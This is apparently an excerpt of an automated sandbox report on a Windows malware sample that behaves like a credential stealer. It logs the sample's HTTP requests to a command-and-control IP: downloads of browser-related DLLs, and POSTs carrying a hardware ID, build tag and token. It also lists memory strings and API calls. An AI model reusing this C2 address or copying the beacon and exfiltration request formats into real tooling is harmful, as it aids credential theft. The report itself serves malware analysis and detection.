2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"jbdtaijovg------AEBGHDBKEBGIDHJJEHCA--

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS

Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: unknown	TCP traffic detected without corresponding DNS query: 40.86.87.10

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EE4C90 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00EE4C90

Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/sqlite3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/freebl3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/mozglue.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/msvcp140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/nss3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/softokn3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/vcruntime140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 40.86.87.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 39 43 32 32 31 34 42 44 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 5a 4f 56 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"5B9C2214BD8B2768236643------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"ZOV------HDGIJJDGCBKFIDHIEBKE--

Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php%
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php(
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php-LTC
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php2
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php9
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php976cbc684762e42ee25308426ba0ad93
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpI
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpe
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpirefox
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phposition:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpv
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php~
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll$
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dllL
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dllv
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/msvcp140.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllQ
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllllU
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllowser
Source: i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/softokn3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/softokn3.dllJtx
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/sqlite3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://40.86.87.10/b13597c85f807692/vcruntime140.dll
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: i3NmF0obCm.exe, i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883712196.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: GCGDGHCB.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: GCGDGHCB.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ep
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.epnacl
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: GCGDGHCB.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GCGDGHCB.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GCGDGHCB.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://support.mozilla.org
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp, i3NmF0obCm.exe, 00000000.00000003.1724627062.000000002185D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, DGCBKECAKFBGCAKECGIE.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: GCGDGHCB.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/eBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VS
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: i3NmF0obCm.exe, 00000000.00000003.1831571860.0000000027A70000.00000004.00000020.00020000.00000000.sdmp, GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: i3NmF0obCm.exe, 00000000.00000003.1831571860.0000000027A70000.00000004.00000020.00020000.00000000.sdmp, GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

PE file has a writeable .text section

Source: i3NmF0obCm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Contains functionality to call native functions

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6C4FED10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C53B700
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C53B8C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C53B910
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C4DF280

Detected potential crypto function

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4D35A0	0_2_6C4D35A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54545C	0_2_6C54545C
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E5440	0_2_6C4E5440
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C515C10	0_2_6C515C10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C522C10	0_2_6C522C10
